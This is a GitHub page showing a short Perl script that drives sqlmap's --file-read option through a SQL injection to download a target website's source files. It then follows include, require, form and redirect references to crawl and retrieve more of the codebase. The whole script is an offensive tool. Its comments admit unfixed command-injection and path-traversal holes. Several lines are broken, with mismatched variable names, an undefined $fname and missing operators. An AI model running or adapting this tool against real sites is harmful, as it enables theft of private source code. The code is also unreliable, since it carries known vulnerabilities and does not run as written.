-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathread_file.pl
More file actions
55 lines (50 loc) · 1.51 KB
/
Copy pathread_file.pl
File metadata and controls
55 lines (50 loc) · 1.51 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
#!/usr/bin/perl -w
# SQLmap source code retriever
# Usage: read_file.pl "[SQLMap injection data]" /web/root /file/to/start/with.php
use File::Basename;
use File::Path qw/mkpath/;
undef $/;
$sqlmap_args = shift @ARGV;
$webroot = shift @ARGV;
push @files, shift @ARGV;
while (@files) {
$fpath = download_file(pop @files);
if ($fpath) {
# TODO: fix command injection
open FILE, "$fpath";
$fcontent = <FILE>;
close FILE;
@new_files = $fcontents =~ /
require[\s_(],*?['"](.*?)['"]
|include.*?['"](.*?)['"]
|load\("(.*?)["?]
|form.*?action="(.*?)["?]
|header\("Location:\s(.*?)["?]
|url:\s"(.*?)["?]
|window\.open\("(.*?)["?]
|window\.location="(.*?)["?]
/xg;
for $file (@new_files) {
next unless $file;
if ($file =~ /^\//) {
$file = "output/$webroot/$file";
} else {
$file = dirname($fpath) . "/" $file;
}
next if -e $file;
$file =~ s/^output//;
print "[*] adding $file to queue...\n";
push @files, $file;
}
}
}
sub download_file {
# TODO: fix command injection vuln
`sqlmap $sqlmap_args --file-read='$fname' --batch` =~ /files saved to.*?(\/.*?) \(same/s;
return unless $1;
mkpath("output" , dirname $fname);
# TODO: fix path traversal vuln
rename($1 "output$fname");
print"[+] downloaded $fname\n";
return "output$fname";
}